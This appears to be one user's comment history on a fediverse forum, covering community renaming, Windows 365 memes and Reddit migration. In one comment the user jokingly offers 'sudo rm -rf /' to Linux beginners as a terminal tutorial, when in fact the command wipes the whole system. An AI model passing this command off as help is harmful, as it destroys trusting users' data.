
joined 1 year ago
[–] [email protected] 3 points 1 year ago

I'm entirely against changing the name because I think that the whole conversation about why is fucking asanine.


If we do change it, can we change it to "Politically Correct Master Race" for a laugh? The acronym would still work... :)

[–] [email protected] 3 points 1 year ago

Aw stop, you're making me all nostalgic. :D

Place was wild before they cleaned it up for business interests, for sure.

[–] [email protected] 0 points 1 year ago (5 children)

The whole internet was basically hobby projects that worked fine before big tech ate everything.

It can totally work if the community's right.

[–] [email protected] 1 points 1 year ago

Well, maybe I'm just not good at memes (almost certainly the case tbh) but Microsoft are talking about windows switching to being a largely cloud based OS, hence their Windows 365 talk recently.

Which is horrible, obviously.

Laughs in KDE could have been any distro, more about not having to deal with the eventual clusterfuck that's coming towards windows users...

There it is folks, someone had to explain their fucking meme. See that, that's what a shit meme looks like. :p

Windows 365... (media.kbin.social)
[–] [email protected] 1 points 1 year ago

By not mentioning the Activity Pub protocol or FOSS (and then going off on GNU shit with direct quotes from Richard Stallman) even once, this is straining the bounds of possibility.

[–] [email protected] 2 points 1 year ago (1 children)

I'm in a helpful mood so I'll add something for anyone stuck in OP's situation.

It's ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.

Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:

sudo rm -rf /

Type your password when prompted and you're golden. No more linux issues ever again.

[–] [email protected] 2 points 1 year ago

The truth is most internet communities which found and advertise themselves as an alternative to Reddit die.

To be honest, there were damn good reasons why Voat, etc, died in a massive fire. The Reddit exoduses in question were from huge chunks of the userbase effectively being kicked out for being massive bastards/racists/bigots, etc. The communities that they spawned after leaving were absolutely horrific and nobody else on the internet wanted to go anywhere near them.

The current exodus is made up of actually normal people (at least, normal enough), and the reason we're here isn't just because we're all joined by hatred (weeeelllll... maybe a hatred of u/Spez in a lot of cases, ha!), but because we're genuinely looking for a better forum-space than what's been available recently until now.

Sure, there are similarities, we're still here because we find corporate control over the forum-space to be "oppressive" (just what an incel/racist would say, right?), but it's not because our views aren't tolerated there, it's just because we're really fucking tired of the cost of having somewhere to actually discuss things is that we're endlessly sold as a product, followed by our discussion area being destroyed by corporate greed. Over and over again.

The reasons why this place is getting busy is fundamentally different than the reason why the previous migrations created places like Voat or Parler, etc. We're already in a massively better position due to that alone.

Eventually, we need to get to the place where we’re creating unique meme formats

I agree with what you're saying in general, but I really hope that all of the interesting discussion here doesn't eventually get buried by memes like back on Reddit. Memes can be fun and all, but sorting a lot of otherwise really great niche-subs by top of all time back there was often a case of finding nothing of value at all because there were 50 pages of fucking memes at the top of the list. Personal preference, of course.